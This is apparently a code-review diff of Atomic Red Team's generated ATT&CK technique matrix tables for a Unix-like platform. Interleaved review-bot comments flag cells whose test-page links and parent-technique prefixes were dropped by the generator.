| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Services: Systemctl](../../T1569.003/T1569.003.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Content Injection](../../T1659/T1659.md) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Systemctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Clipboard Data](../../T1115/T1115.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Browser Extensions](../../T1176/T1176.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
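Review bot: the replacement rows in this hunk downgrade techniques that the previous output linked to test pages into CONTRIBUTE A TEST placeholders: `[System Services: Systemctl](../../T1569.003/T1569.003.md)` becomes `Systemctl [CONTRIBUTE A TEST]`, and `[Content Injection](../../T1659/T1659.md)` becomes `Content Injection [CONTRIBUTE A TEST]` in both the Initial Access column and the Command and Control column. Unless the T1569.003 and T1659 test directories are removed elsewhere in this change (nothing visible here shows that), the Python generator's technique-to-tests lookup is missing these IDs; check how it keys that lookup (ID versus technique name) before merging, or say in the commit message that the drop is intended. The same rows also strip the parent-technique prefix, so the cell reads as a bare `Systemctl` while neighbouring sub-technique cells such as `Abuse Elevation Control Mechanism: Sudo and Sudo Caching` keep theirs; pick one naming form and apply it consistently.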
@@ -27,7 +27,7 @@
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Log Enumeration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md) | [Data Destruction](../../T1485/T1485.md) |
| | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Discovery](../../T1057/T1057.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Access Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | [Non-Standard Port](../../T1571/T1571.md) | Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
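Review bot: the single changed cell in this hunk turns `[Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)` into `Python Startup Hooks [CONTRIBUTE A TEST]`, losing both the link to the T1546.018 test page and the parent-technique prefix. If that test page still exists, this is a lookup regression in the converter rather than a content change; if the intent is to flatten sub-technique names, other cells in the same row (for example `Input Capture: Credential API Hooking`) were not flattened, so the output is inconsistent either way. Clarify which it is and regenerate.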
@@ -37,7 +37,7 @@
| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Overwrite Process Arguments [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Remote Desktop Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Local Storage Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Bind Mounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
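Review bot: same T1546.018 change as the previous hunk in this file: `[Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)` is replaced by an unlinked `Python Startup Hooks [CONTRIBUTE A TEST]`. Because the identical cell changes in two separate rows of the matrix, the cause is one lookup in the generator rather than a one-off data edit, so whichever way it is resolved (restore the lookup or document the removal), the fix belongs in the generator, not in a hand edit of the generated matrix.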
+7 -7
View File
@@ -3,14 +3,14 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | [Remote Services:VNC](../../T1021.005/T1021.005.md) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
